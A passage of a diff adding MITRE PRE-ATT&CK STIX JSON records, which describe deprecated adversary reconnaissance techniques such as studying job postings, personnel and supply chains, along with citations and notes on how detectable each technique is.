(Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1270", + "external_id": "T1270" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an adversary to undergo an intensive research process. It is resource intensive or requires special data access. May be easier for certain specialty use cases.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1047", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1248).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. 
This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1248", + "external_id": "T1248" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Impossible to differentiate between an adversary and a normal user when accessing open/public information.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Publicly posted information by design. Providing too much detail in the job posting could aid the adversary in learning more about the target's environment and possible technical weaknesses/deficiencies.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1025", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1278).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1278", + "external_id": "T1278" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1055", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1267).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1267", + "external_id": "T1267" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1044", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify people of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1269).\n\nThe attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1269", + "external_id": "T1269" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. 
(2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Common defenses protecting against poor OPSEC practices are traditionally more policy-based in nature rather than technical. Policy-based mitigations are generally more difficult to enforce and track violations, making it more difficult that this technique can be detected by common defenses.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Specialty cases enable an adversary to use key words in order to search social media and identify personnel with poor OPSEC practices who may have access to specialized information which would make them a target of interest. In addition, the open nature of social media leads to a tendency among individuals to overshare, encouraging poor OPSEC and increasing the ease by which an adversary can identify interesting targets.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1046", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--762771c2-3675-4535-88e9-b1f891758974", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify personnel with an authority/privilege", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1271).\n\nPersonnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1271", + "external_id": "T1271" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The layers of data required and potential gaps of information to map a specific person to an authority or privilege on a network requires access to resources that may not tip off a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an adversary to undergo an intensive research process. It is resource intensive or requires special data access. 
May be easier for certain specialty use cases.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1048", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c9fb4451-729d-4771-b205-52c1829f949c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify resources required to build capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1348).\n\nAs with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1348", + "external_id": "T1348" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Recruitment is, by its nature, either clandestine or off the record.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Like target organizations, adversary organizations are competing to identify and hire top technical talent. 
Training less technical staff is also a viable option.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1125", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify security defensive capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1263).\n\nSecurity defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1263", + "external_id": "T1263" + }, + { + "source_name": "OSFingerprinting2014", + "description": "InfoSec Institute. (2014, June 19). What You Must Know About OS Fingerprinting. Retrieved March 1, 2017." + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Technically, the defender has the ability to detect. However, this is typically not performed as this type of traffic would likely not prompt the defender to take any actionable defense. 
In addition, this would require the defender to closely review their access logs for any suspicious activity (if the activity is even logged).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The adversary will have some insight into defenses based on dropped traffic or filtered responses. It is more difficult to pinpoint which defenses are implemented (e.g., [https://www.fireeye.com FireEye] WMPS, [https://www.hpe.com Hewlett Packard Enterprise] Tipping Point IPS).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1040", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7dae871c-effc-444b-9962-4b7efefe7d40", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify sensitive personnel information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1274).\n\nAn adversary may identify sensitive personnel information not typically posted on a social media site, such as address, marital status, financial history, and law enforcement infractions. This could be conducted by searching public records that are frequently available for free or at a low cost online. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1274", + "external_id": "T1274" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). 
RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This type of information is useful to understand the individual and their ability to be blackmailed. Searching public records is easy and most information can be purchased for a low cost if the adversary really wants it.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1051", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1276).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit organizational relationships. 
(Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1276", + "external_id": "T1276" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process. May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1053", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1246).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1246", + "external_id": "T1246" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + }, + { + "source_name": "RSA-supply-chain", + "description": "RSA Research. (2017, February). KINGSLAYER \u2013 A SUPPLY CHAIN ATTACK. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, if not impossible to detect, because the adversary may collect this information from external sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Supply chain diversity of sourcing increases adversary difficulty with accurate mapping. 
Industry practice has moved towards agile sourcing.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1023", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1265).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1265", + "external_id": "T1265" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process to obtain the full picture. It is possible to obtain basic information/some aspects via OSINT. May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1042", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify technology usage patterns", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1264).\n\nTechnology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1264", + "external_id": "T1264" + }, + { + "source_name": "SANSRemoteAccess", + "description": "Jason Ragland. (2010, January 18). Remotely Accessing Sensitive Resources. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Physical observations, OSINT for remote access instructions, and other techniques are not detectable.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Determine if users work offsite, connect remotely, or other possibly less restricted/secured access techniques.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1041", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ad124f84-52d2-40e3-95dd-cfdd44eae6ef", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify vulnerabilities in third-party software libraries", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1389).\n\nMany applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. 
(Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1389", + "external_id": "T1389" + }, + { + "source_name": "Flexera News Vulnerabilities", + "description": "John Lipsey. (2015, March 25). 15,435 Vulnerabilities in Close to 4,000 Applications in 2014. Retrieved April 12, 2017." + }, + { + "source_name": "Android Security Review 2015", + "description": "Google. (2016, April). Android Security 2015 Year In Review. Retrieved April 12, 2017." + }, + { + "source_name": "Android Multidex RCE", + "description": "Ryan Welton. (2015, June 15). A Pattern for Remote Code Execution using Arbitrary File Writes and MultiDex Applications. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "Open source software has great appeal mostly due to the time savings and that it is free. However, using this code without assessing it's security is akin to blindly executing third party software. Companies often do not dedicate the time to appropriately detect and scan for vulnerabilities. The mainstream mobile application stores scan applications for some known vulnerabilities. For example, Google's Android Application Security Improvement Program identifies and alerts developers to vulnerabilities present in their applications from use of the Vungle, Apache Cordova, WebView SSL, GnuTLS, and Vitamio third-party libraries. 
However, these scans are not likely to cover all vulnerable libraries, developers may not always act on the results, and the results may not be made available to impacted end users of the applications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Developers commonly use open source libraries such that where an adversary can easily discover known vulnerabilities and create exploits. It is also generally easy to decompile arbitrary mobile applications to determine what libraries they use, and similarly use this information to correlate against known CVEs and exploit packages.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1166", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify web defensive services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1256).\n\nAn adversary can attempt to identify web defensive services as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. 
(Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1256", + "external_id": "T1256" + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Active service detection may trigger an alert. Passive service enumeration is not detected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary can passively detect services (e.g., [https://www.cloudflare.com/ CloudFlare] routing) or actively detect services (e.g., by purposefully tripping security defenses)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1033", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--73e394e5-3d8a-40d1-ab8c-a1b4ea9db424", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Install and configure hardware, network, and systems", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1336).\n\nAn adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. 
(Citation: KasperskyRedOctober)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1336", + "external_id": "T1336" + }, + { + "source_name": "KasperskyRedOctober", + "description": "Kaspersky Labs. (2013, January 14). Kaspersky Lab Identifies Operation \u201cRed October,\u201d an Advanced Cyber-Espionage Campaign Targeting Diplomatic and Government Institutions Worldwide. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Skills are common to majority of computer scientists and \"hackers\". Can be easily obtained through contracting if not organic to adversary's organization.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1113", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Leverage compromised 3rd party resources", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThe utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). 
